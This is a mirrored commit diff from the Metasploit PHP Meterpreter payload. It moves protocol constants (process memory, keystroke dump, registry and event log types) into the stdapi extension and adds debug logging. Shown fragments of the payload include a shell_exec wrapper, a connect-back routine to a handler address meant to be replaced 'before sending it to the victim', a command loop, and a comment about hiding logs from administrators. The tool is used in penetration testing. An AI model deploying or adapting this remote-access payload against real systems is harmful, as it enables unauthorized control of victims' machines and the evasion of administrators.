mirror of
https://github.com/rapid7/metasploit-payloads
synced 2024-11-20 14:39:22 +01:00
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone
git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
3abe2d478d
commit
89b385521b
@ -3,6 +3,146 @@
|
||||
# STDAPI
|
||||
##
|
||||
|
||||
##
|
||||
# General
|
||||
##
|
||||
define("TLV_TYPE_HANDLE", TLV_META_TYPE_UINT | 600);
|
||||
define("TLV_TYPE_INHERIT", TLV_META_TYPE_BOOL | 601);
|
||||
define("TLV_TYPE_PROCESS_HANDLE", TLV_META_TYPE_UINT | 630);
|
||||
define("TLV_TYPE_THREAD_HANDLE", TLV_META_TYPE_UINT | 631);
|
||||
|
||||
##
|
||||
# Fs
|
||||
##
|
||||
define("TLV_TYPE_DIRECTORY_PATH", TLV_META_TYPE_STRING | 1200);
|
||||
define("TLV_TYPE_FILE_NAME", TLV_META_TYPE_STRING | 1201);
|
||||
define("TLV_TYPE_FILE_PATH", TLV_META_TYPE_STRING | 1202);
|
||||
define("TLV_TYPE_FILE_MODE", TLV_META_TYPE_STRING | 1203);
|
||||
define("TLV_TYPE_STAT_BUF", TLV_META_TYPE_COMPLEX | 1220);
|
||||
|
||||
##
|
||||
# Net
|
||||
##
|
||||
define("TLV_TYPE_HOST_NAME", TLV_META_TYPE_STRING | 1400);
|
||||
define("TLV_TYPE_PORT", TLV_META_TYPE_UINT | 1401);
|
||||
|
||||
define("TLV_TYPE_SUBNET", TLV_META_TYPE_RAW | 1420);
|
||||
define("TLV_TYPE_NETMASK", TLV_META_TYPE_RAW | 1421);
|
||||
define("TLV_TYPE_GATEWAY", TLV_META_TYPE_RAW | 1422);
|
||||
define("TLV_TYPE_NETWORK_ROUTE", TLV_META_TYPE_GROUP | 1423);
|
||||
|
||||
define("TLV_TYPE_IP", TLV_META_TYPE_RAW | 1430);
|
||||
define("TLV_TYPE_MAC_ADDRESS", TLV_META_TYPE_RAW | 1431);
|
||||
define("TLV_TYPE_MAC_NAME", TLV_META_TYPE_STRING | 1432);
|
||||
define("TLV_TYPE_NETWORK_INTERFACE", TLV_META_TYPE_GROUP | 1433);
|
||||
|
||||
define("TLV_TYPE_SUBNET_STRING", TLV_META_TYPE_STRING | 1440);
|
||||
define("TLV_TYPE_NETMASK_STRING", TLV_META_TYPE_STRING | 1441);
|
||||
define("TLV_TYPE_GATEWAY_STRING", TLV_META_TYPE_STRING | 1442);
|
||||
|
||||
# Socket
|
||||
define("TLV_TYPE_PEER_HOST", TLV_META_TYPE_STRING | 1500);
|
||||
define("TLV_TYPE_PEER_PORT", TLV_META_TYPE_UINT | 1501);
|
||||
define("TLV_TYPE_LOCAL_HOST", TLV_META_TYPE_STRING | 1502);
|
||||
define("TLV_TYPE_LOCAL_PORT", TLV_META_TYPE_UINT | 1503);
|
||||
define("TLV_TYPE_CONNECT_RETRIES", TLV_META_TYPE_UINT | 1504);
|
||||
|
||||
define("TLV_TYPE_SHUTDOWN_HOW", TLV_META_TYPE_UINT | 1530);
|
||||
|
||||
##
|
||||
# Sys
|
||||
##
|
||||
define("PROCESS_EXECUTE_FLAG_HIDDEN", (1 << 0));
|
||||
define("PROCESS_EXECUTE_FLAG_CHANNELIZED", (1 << 1));
|
||||
define("PROCESS_EXECUTE_FLAG_SUSPENDED", (1 << 2));
|
||||
define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
|
||||
|
||||
# Registry
|
||||
define("TLV_TYPE_HKEY", TLV_META_TYPE_UINT | 1000);
|
||||
define("TLV_TYPE_ROOT_KEY", TLV_TYPE_HKEY);
|
||||
define("TLV_TYPE_BASE_KEY", TLV_META_TYPE_STRING | 1001);
|
||||
define("TLV_TYPE_PERMISSION", TLV_META_TYPE_UINT | 1002);
|
||||
define("TLV_TYPE_KEY_NAME", TLV_META_TYPE_STRING | 1003);
|
||||
define("TLV_TYPE_VALUE_NAME", TLV_META_TYPE_STRING | 1010);
|
||||
define("TLV_TYPE_VALUE_TYPE", TLV_META_TYPE_UINT | 1011);
|
||||
define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012);
|
||||
|
||||
# Config
|
||||
define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040);
|
||||
define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041);
|
||||
define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042);
|
||||
|
||||
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
|
||||
|
||||
# Process
|
||||
define("TLV_TYPE_BASE_ADDRESS", TLV_META_TYPE_UINT | 2000);
|
||||
define("TLV_TYPE_ALLOCATION_TYPE", TLV_META_TYPE_UINT | 2001);
|
||||
define("TLV_TYPE_PROTECTION", TLV_META_TYPE_UINT | 2002);
|
||||
define("TLV_TYPE_PROCESS_PERMS", TLV_META_TYPE_UINT | 2003);
|
||||
define("TLV_TYPE_PROCESS_MEMORY", TLV_META_TYPE_RAW | 2004);
|
||||
define("TLV_TYPE_ALLOC_BASE_ADDRESS", TLV_META_TYPE_UINT | 2005);
|
||||
define("TLV_TYPE_MEMORY_STATE", TLV_META_TYPE_UINT | 2006);
|
||||
define("TLV_TYPE_MEMORY_TYPE", TLV_META_TYPE_UINT | 2007);
|
||||
define("TLV_TYPE_ALLOC_PROTECTION", TLV_META_TYPE_UINT | 2008);
|
||||
define("TLV_TYPE_PID", TLV_META_TYPE_UINT | 2300);
|
||||
define("TLV_TYPE_PROCESS_NAME", TLV_META_TYPE_STRING | 2301);
|
||||
define("TLV_TYPE_PROCESS_PATH", TLV_META_TYPE_STRING | 2302);
|
||||
define("TLV_TYPE_PROCESS_GROUP", TLV_META_TYPE_GROUP | 2303);
|
||||
define("TLV_TYPE_PROCESS_FLAGS", TLV_META_TYPE_UINT | 2304);
|
||||
define("TLV_TYPE_PROCESS_ARGUMENTS", TLV_META_TYPE_STRING | 2305);
|
||||
|
||||
define("TLV_TYPE_IMAGE_FILE", TLV_META_TYPE_STRING | 2400);
|
||||
define("TLV_TYPE_IMAGE_FILE_PATH", TLV_META_TYPE_STRING | 2401);
|
||||
define("TLV_TYPE_PROCEDURE_NAME", TLV_META_TYPE_STRING | 2402);
|
||||
define("TLV_TYPE_PROCEDURE_ADDRESS", TLV_META_TYPE_UINT | 2403);
|
||||
define("TLV_TYPE_IMAGE_BASE", TLV_META_TYPE_UINT | 2404);
|
||||
define("TLV_TYPE_IMAGE_GROUP", TLV_META_TYPE_GROUP | 2405);
|
||||
define("TLV_TYPE_IMAGE_NAME", TLV_META_TYPE_STRING | 2406);
|
||||
|
||||
define("TLV_TYPE_THREAD_ID", TLV_META_TYPE_UINT | 2500);
|
||||
define("TLV_TYPE_THREAD_PERMS", TLV_META_TYPE_UINT | 2502);
|
||||
define("TLV_TYPE_EXIT_CODE", TLV_META_TYPE_UINT | 2510);
|
||||
define("TLV_TYPE_ENTRY_POINT", TLV_META_TYPE_UINT | 2511);
|
||||
define("TLV_TYPE_ENTRY_PARAMETER", TLV_META_TYPE_UINT | 2512);
|
||||
define("TLV_TYPE_CREATION_FLAGS", TLV_META_TYPE_UINT | 2513);
|
||||
|
||||
define("TLV_TYPE_REGISTER_NAME", TLV_META_TYPE_STRING | 2540);
|
||||
define("TLV_TYPE_REGISTER_SIZE", TLV_META_TYPE_UINT | 2541);
|
||||
define("TLV_TYPE_REGISTER_VALUE_32", TLV_META_TYPE_UINT | 2542);
|
||||
define("TLV_TYPE_REGISTER", TLV_META_TYPE_GROUP | 2550);
|
||||
|
||||
##
|
||||
# Ui
|
||||
##
|
||||
define("TLV_TYPE_IDLE_TIME", TLV_META_TYPE_UINT | 3000);
|
||||
define("TLV_TYPE_KEYS_DUMP", TLV_META_TYPE_STRING | 3001);
|
||||
define("TLV_TYPE_DESKTOP", TLV_META_TYPE_STRING | 3002);
|
||||
|
||||
##
|
||||
# Event Log
|
||||
##
|
||||
define("TLV_TYPE_EVENT_SOURCENAME", TLV_META_TYPE_STRING | 4000);
|
||||
define("TLV_TYPE_EVENT_HANDLE", TLV_META_TYPE_UINT | 4001);
|
||||
define("TLV_TYPE_EVENT_NUMRECORDS", TLV_META_TYPE_UINT | 4002);
|
||||
|
||||
define("TLV_TYPE_EVENT_READFLAGS", TLV_META_TYPE_UINT | 4003);
|
||||
define("TLV_TYPE_EVENT_RECORDOFFSET", TLV_META_TYPE_UINT | 4004);
|
||||
|
||||
define("TLV_TYPE_EVENT_RECORDNUMBER", TLV_META_TYPE_UINT | 4006);
|
||||
define("TLV_TYPE_EVENT_TIMEGENERATED", TLV_META_TYPE_UINT | 4007);
|
||||
define("TLV_TYPE_EVENT_TIMEWRITTEN", TLV_META_TYPE_UINT | 4008);
|
||||
define("TLV_TYPE_EVENT_ID", TLV_META_TYPE_UINT | 4009);
|
||||
define("TLV_TYPE_EVENT_TYPE", TLV_META_TYPE_UINT | 4010);
|
||||
define("TLV_TYPE_EVENT_CATEGORY", TLV_META_TYPE_UINT | 4011);
|
||||
define("TLV_TYPE_EVENT_STRING", TLV_META_TYPE_STRING | 4012);
|
||||
define("TLV_TYPE_EVENT_DATA", TLV_META_TYPE_RAW | 4013);
|
||||
|
||||
##
|
||||
# Power
|
||||
##
|
||||
define("TLV_TYPE_POWER_FLAGS", TLV_META_TYPE_UINT | 4100);
|
||||
define("TLV_TYPE_POWER_REASON", TLV_META_TYPE_UINT | 4101);
|
||||
|
||||
# Wrap everything in checks for existence of the new functions in case we get
|
||||
# eval'd twice
|
||||
my_print("Evaling stdapi");
|
||||
|
@ -1,5 +1,8 @@
|
||||
#<?php
|
||||
|
||||
# Everything that needs to be global has to be made so explicitly so we can run
|
||||
# inside a call to create_user_func($user_input);
|
||||
|
||||
# global list of channels
|
||||
if (!isset($GLOBALS['channels'])) {
|
||||
$GLOBALS['channels'] = array();
|
||||
@ -22,7 +25,7 @@ if (!isset($GLOBALS['readers'])) {
|
||||
}
|
||||
|
||||
function my_print($str) {
|
||||
#error_log($str);
|
||||
error_log($str);
|
||||
}
|
||||
|
||||
my_print("Evaling main meterpreter stage");
|
||||
@ -37,8 +40,7 @@ function dump_array($arr, $name=null) {
|
||||
my_print(sprintf("$name (%s)", count($arr)));
|
||||
}
|
||||
foreach ($arr as $key => $val) {
|
||||
$foo = sprintf(" $key ($val)");
|
||||
my_print($foo);
|
||||
my_print(sprintf(" $key ($val)"));
|
||||
}
|
||||
}
|
||||
function dump_readers() {
|
||||
@ -149,146 +151,6 @@ define("TLV_TYPE_MIGRATE_LEN", TLV_META_TYPE_UINT | 403);
|
||||
define("TLV_TYPE_CIPHER_NAME", TLV_META_TYPE_STRING | 500);
|
||||
define("TLV_TYPE_CIPHER_PARAMETERS", TLV_META_TYPE_GROUP | 501);
|
||||
|
||||
##
|
||||
# General
|
||||
##
|
||||
define("TLV_TYPE_HANDLE", TLV_META_TYPE_UINT | 600);
|
||||
define("TLV_TYPE_INHERIT", TLV_META_TYPE_BOOL | 601);
|
||||
define("TLV_TYPE_PROCESS_HANDLE", TLV_META_TYPE_UINT | 630);
|
||||
define("TLV_TYPE_THREAD_HANDLE", TLV_META_TYPE_UINT | 631);
|
||||
|
||||
##
|
||||
# Fs
|
||||
##
|
||||
define("TLV_TYPE_DIRECTORY_PATH", TLV_META_TYPE_STRING | 1200);
|
||||
define("TLV_TYPE_FILE_NAME", TLV_META_TYPE_STRING | 1201);
|
||||
define("TLV_TYPE_FILE_PATH", TLV_META_TYPE_STRING | 1202);
|
||||
define("TLV_TYPE_FILE_MODE", TLV_META_TYPE_STRING | 1203);
|
||||
define("TLV_TYPE_STAT_BUF", TLV_META_TYPE_COMPLEX | 1220);
|
||||
|
||||
##
|
||||
# Net
|
||||
##
|
||||
define("TLV_TYPE_HOST_NAME", TLV_META_TYPE_STRING | 1400);
|
||||
define("TLV_TYPE_PORT", TLV_META_TYPE_UINT | 1401);
|
||||
|
||||
define("TLV_TYPE_SUBNET", TLV_META_TYPE_RAW | 1420);
|
||||
define("TLV_TYPE_NETMASK", TLV_META_TYPE_RAW | 1421);
|
||||
define("TLV_TYPE_GATEWAY", TLV_META_TYPE_RAW | 1422);
|
||||
define("TLV_TYPE_NETWORK_ROUTE", TLV_META_TYPE_GROUP | 1423);
|
||||
|
||||
define("TLV_TYPE_IP", TLV_META_TYPE_RAW | 1430);
|
||||
define("TLV_TYPE_MAC_ADDRESS", TLV_META_TYPE_RAW | 1431);
|
||||
define("TLV_TYPE_MAC_NAME", TLV_META_TYPE_STRING | 1432);
|
||||
define("TLV_TYPE_NETWORK_INTERFACE", TLV_META_TYPE_GROUP | 1433);
|
||||
|
||||
define("TLV_TYPE_SUBNET_STRING", TLV_META_TYPE_STRING | 1440);
|
||||
define("TLV_TYPE_NETMASK_STRING", TLV_META_TYPE_STRING | 1441);
|
||||
define("TLV_TYPE_GATEWAY_STRING", TLV_META_TYPE_STRING | 1442);
|
||||
|
||||
# Socket
|
||||
define("TLV_TYPE_PEER_HOST", TLV_META_TYPE_STRING | 1500);
|
||||
define("TLV_TYPE_PEER_PORT", TLV_META_TYPE_UINT | 1501);
|
||||
define("TLV_TYPE_LOCAL_HOST", TLV_META_TYPE_STRING | 1502);
|
||||
define("TLV_TYPE_LOCAL_PORT", TLV_META_TYPE_UINT | 1503);
|
||||
define("TLV_TYPE_CONNECT_RETRIES", TLV_META_TYPE_UINT | 1504);
|
||||
|
||||
define("TLV_TYPE_SHUTDOWN_HOW", TLV_META_TYPE_UINT | 1530);
|
||||
|
||||
##
|
||||
# Sys
|
||||
##
|
||||
define("PROCESS_EXECUTE_FLAG_HIDDEN", (1 << 0));
|
||||
define("PROCESS_EXECUTE_FLAG_CHANNELIZED", (1 << 1));
|
||||
define("PROCESS_EXECUTE_FLAG_SUSPENDED", (1 << 2));
|
||||
define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
|
||||
|
||||
# Registry
|
||||
define("TLV_TYPE_HKEY", TLV_META_TYPE_UINT | 1000);
|
||||
define("TLV_TYPE_ROOT_KEY", TLV_TYPE_HKEY);
|
||||
define("TLV_TYPE_BASE_KEY", TLV_META_TYPE_STRING | 1001);
|
||||
define("TLV_TYPE_PERMISSION", TLV_META_TYPE_UINT | 1002);
|
||||
define("TLV_TYPE_KEY_NAME", TLV_META_TYPE_STRING | 1003);
|
||||
define("TLV_TYPE_VALUE_NAME", TLV_META_TYPE_STRING | 1010);
|
||||
define("TLV_TYPE_VALUE_TYPE", TLV_META_TYPE_UINT | 1011);
|
||||
define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012);
|
||||
|
||||
# Config
|
||||
define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040);
|
||||
define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041);
|
||||
define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042);
|
||||
|
||||
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
|
||||
|
||||
# Process
|
||||
define("TLV_TYPE_BASE_ADDRESS", TLV_META_TYPE_UINT | 2000);
|
||||
define("TLV_TYPE_ALLOCATION_TYPE", TLV_META_TYPE_UINT | 2001);
|
||||
define("TLV_TYPE_PROTECTION", TLV_META_TYPE_UINT | 2002);
|
||||
define("TLV_TYPE_PROCESS_PERMS", TLV_META_TYPE_UINT | 2003);
|
||||
define("TLV_TYPE_PROCESS_MEMORY", TLV_META_TYPE_RAW | 2004);
|
||||
define("TLV_TYPE_ALLOC_BASE_ADDRESS", TLV_META_TYPE_UINT | 2005);
|
||||
define("TLV_TYPE_MEMORY_STATE", TLV_META_TYPE_UINT | 2006);
|
||||
define("TLV_TYPE_MEMORY_TYPE", TLV_META_TYPE_UINT | 2007);
|
||||
define("TLV_TYPE_ALLOC_PROTECTION", TLV_META_TYPE_UINT | 2008);
|
||||
define("TLV_TYPE_PID", TLV_META_TYPE_UINT | 2300);
|
||||
define("TLV_TYPE_PROCESS_NAME", TLV_META_TYPE_STRING | 2301);
|
||||
define("TLV_TYPE_PROCESS_PATH", TLV_META_TYPE_STRING | 2302);
|
||||
define("TLV_TYPE_PROCESS_GROUP", TLV_META_TYPE_GROUP | 2303);
|
||||
define("TLV_TYPE_PROCESS_FLAGS", TLV_META_TYPE_UINT | 2304);
|
||||
define("TLV_TYPE_PROCESS_ARGUMENTS", TLV_META_TYPE_STRING | 2305);
|
||||
|
||||
define("TLV_TYPE_IMAGE_FILE", TLV_META_TYPE_STRING | 2400);
|
||||
define("TLV_TYPE_IMAGE_FILE_PATH", TLV_META_TYPE_STRING | 2401);
|
||||
define("TLV_TYPE_PROCEDURE_NAME", TLV_META_TYPE_STRING | 2402);
|
||||
define("TLV_TYPE_PROCEDURE_ADDRESS", TLV_META_TYPE_UINT | 2403);
|
||||
define("TLV_TYPE_IMAGE_BASE", TLV_META_TYPE_UINT | 2404);
|
||||
define("TLV_TYPE_IMAGE_GROUP", TLV_META_TYPE_GROUP | 2405);
|
||||
define("TLV_TYPE_IMAGE_NAME", TLV_META_TYPE_STRING | 2406);
|
||||
|
||||
define("TLV_TYPE_THREAD_ID", TLV_META_TYPE_UINT | 2500);
|
||||
define("TLV_TYPE_THREAD_PERMS", TLV_META_TYPE_UINT | 2502);
|
||||
define("TLV_TYPE_EXIT_CODE", TLV_META_TYPE_UINT | 2510);
|
||||
define("TLV_TYPE_ENTRY_POINT", TLV_META_TYPE_UINT | 2511);
|
||||
define("TLV_TYPE_ENTRY_PARAMETER", TLV_META_TYPE_UINT | 2512);
|
||||
define("TLV_TYPE_CREATION_FLAGS", TLV_META_TYPE_UINT | 2513);
|
||||
|
||||
define("TLV_TYPE_REGISTER_NAME", TLV_META_TYPE_STRING | 2540);
|
||||
define("TLV_TYPE_REGISTER_SIZE", TLV_META_TYPE_UINT | 2541);
|
||||
define("TLV_TYPE_REGISTER_VALUE_32", TLV_META_TYPE_UINT | 2542);
|
||||
define("TLV_TYPE_REGISTER", TLV_META_TYPE_GROUP | 2550);
|
||||
|
||||
##
|
||||
# Ui
|
||||
##
|
||||
define("TLV_TYPE_IDLE_TIME", TLV_META_TYPE_UINT | 3000);
|
||||
define("TLV_TYPE_KEYS_DUMP", TLV_META_TYPE_STRING | 3001);
|
||||
define("TLV_TYPE_DESKTOP", TLV_META_TYPE_STRING | 3002);
|
||||
|
||||
##
|
||||
# Event Log
|
||||
##
|
||||
define("TLV_TYPE_EVENT_SOURCENAME", TLV_META_TYPE_STRING | 4000);
|
||||
define("TLV_TYPE_EVENT_HANDLE", TLV_META_TYPE_UINT | 4001);
|
||||
define("TLV_TYPE_EVENT_NUMRECORDS", TLV_META_TYPE_UINT | 4002);
|
||||
|
||||
define("TLV_TYPE_EVENT_READFLAGS", TLV_META_TYPE_UINT | 4003);
|
||||
define("TLV_TYPE_EVENT_RECORDOFFSET", TLV_META_TYPE_UINT | 4004);
|
||||
|
||||
define("TLV_TYPE_EVENT_RECORDNUMBER", TLV_META_TYPE_UINT | 4006);
|
||||
define("TLV_TYPE_EVENT_TIMEGENERATED", TLV_META_TYPE_UINT | 4007);
|
||||
define("TLV_TYPE_EVENT_TIMEWRITTEN", TLV_META_TYPE_UINT | 4008);
|
||||
define("TLV_TYPE_EVENT_ID", TLV_META_TYPE_UINT | 4009);
|
||||
define("TLV_TYPE_EVENT_TYPE", TLV_META_TYPE_UINT | 4010);
|
||||
define("TLV_TYPE_EVENT_CATEGORY", TLV_META_TYPE_UINT | 4011);
|
||||
define("TLV_TYPE_EVENT_STRING", TLV_META_TYPE_STRING | 4012);
|
||||
define("TLV_TYPE_EVENT_DATA", TLV_META_TYPE_RAW | 4013);
|
||||
|
||||
##
|
||||
# Power
|
||||
##
|
||||
define("TLV_TYPE_POWER_FLAGS", TLV_META_TYPE_UINT | 4100);
|
||||
define("TLV_TYPE_POWER_REASON", TLV_META_TYPE_UINT | 4101);
|
||||
|
||||
function my_cmd($cmd) {
|
||||
return shell_exec($cmd);
|
||||
}
|
||||
@ -299,9 +161,6 @@ function is_windows() {
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
##
|
||||
# Worker functions
|
||||
##
|
||||
@ -711,13 +570,16 @@ function connect($ipaddr, $port, $proto='tcp') {
|
||||
# Prefer the stream versions so we don't have to use both select functions
|
||||
# unnecessarily, but fall back to socket_create if they aren't available.
|
||||
if (is_callable('stream_socket_client')) {
|
||||
my_print("stream_socket_client");
|
||||
my_print("stream_socket_client({$proto}://{$ipaddr}:{$port})");
|
||||
$sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
|
||||
my_print("Got a sock: $sock");
|
||||
if (!$sock) { return false; }
|
||||
if ($proto == 'tcp') {
|
||||
register_stream($sock);
|
||||
} elseif ($proto == 'udp') {
|
||||
register_stream($sock, $ipaddr, $port);
|
||||
} else {
|
||||
my_print("WTF proto is this: '$proto'");
|
||||
}
|
||||
} else
|
||||
if (is_callable('fsockopen')) {
|
||||
@ -935,7 +797,7 @@ ob_implicit_flush();
|
||||
# Turn off error reporting so we don't leave any ugly logs. Why make an
|
||||
# administrator's job easier if we don't have to? =)
|
||||
error_reporting(0);
|
||||
#error_reporting(E_ALL);
|
||||
error_reporting(E_ALL);
|
||||
|
||||
@ignore_user_abort(true);
|
||||
# Has no effect in safe mode, but try anyway
|
||||
@ -944,11 +806,12 @@ error_reporting(0);
|
||||
|
||||
# If we don't have a socket we're standalone, setup the connection here.
|
||||
# Otherwise, this is a staged payload, don't bother connecting
|
||||
if (!isset($msgsock)) {
|
||||
if (!isset($GLOBALS['msgsock'])) {
|
||||
# The payload handler overwrites this with the correct LHOST before sending
|
||||
# it to the victim.
|
||||
$ipaddr = '127.0.0.1';
|
||||
$port = 4444;
|
||||
my_print("Don't have a msgsock, trying to connect($ipaddr, $port)");
|
||||
if (FALSE !== strpos($ipaddr,":")) {
|
||||
# ipv6 requires brackets around the address
|
||||
$ipaddr = "[".$ipaddr."]";
|
||||
@ -956,6 +819,10 @@ if (!isset($msgsock)) {
|
||||
$msgsock = connect($ipaddr, $port);
|
||||
if (!$msgsock) { die(); }
|
||||
} else {
|
||||
# The ABI for PHP stagers is a socket in $msgsock and it's type (socket or
|
||||
# stream) in $msgsock_type
|
||||
$msgsock = $GLOBALS['msgsock'];
|
||||
$msgsock_type = $GLOBALS['msgsock_type'];
|
||||
switch ($msgsock_type) {
|
||||
case 'socket':
|
||||
register_socket($msgsock);
|
||||
@ -973,7 +840,7 @@ add_reader($msgsock);
|
||||
#
|
||||
$r=$GLOBALS['readers'];
|
||||
while (false !== ($cnt = select($r, $w=null, $e=null, 1))) {
|
||||
#my_print(sprintf("Returned from select with %s readers", count($r)));
|
||||
my_print(sprintf("Returned from select with %s readers", count($r)));
|
||||
$read_failed = false;
|
||||
for ($i = 0; $i < $cnt; $i++) {
|
||||
$ready = $r[$i];
|
||||
|
Loading…
Reference in New Issue
Block a user